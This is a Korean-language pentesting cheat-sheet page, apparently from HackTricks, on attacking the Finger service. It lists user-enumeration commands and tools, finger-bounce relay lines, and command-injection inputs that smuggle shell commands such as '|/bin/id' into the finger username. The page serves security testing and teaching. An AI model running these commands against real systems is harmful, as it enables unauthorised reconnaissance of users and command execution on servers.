# 79 - Pentesting Finger {{#include ../banners/hacktricks-training.md}} ## **기본 정보** **Finger** 프로그램/서비스는 컴퓨터 사용자에 대한 세부 정보를 검색하는 데 사용됩니다. 일반적으로 제공되는 정보에는 **사용자의 로그인 이름, 전체 이름**이 포함되며, 경우에 따라 추가 세부 정보가 포함될 수 있습니다. 이러한 추가 세부 정보에는 사무실 위치 및 전화번호(가능한 경우), 사용자가 로그인한 시간, 비활성 기간(유휴 시간), 사용자가 마지막으로 읽은 메일의 시간, 사용자의 계획 및 프로젝트 파일의 내용이 포함될 수 있습니다. **기본 포트:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **열거** ### **배너 수집/기본 연결** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **사용자 열거** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` 대안으로 **finger-user-enum**을 [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)에서 사용할 수 있습니다. 몇 가지 예: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap은 기본 스크립트를 사용하여 스크립트를 실행합니다** ### Metasploit은 Nmap보다 더 많은 트릭을 사용합니다 ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan - `port:79 USER` ## 명령 실행 ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [시스템을 finger 릴레이로 사용하기](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ``` {{#include ../banners/hacktricks-training.md}}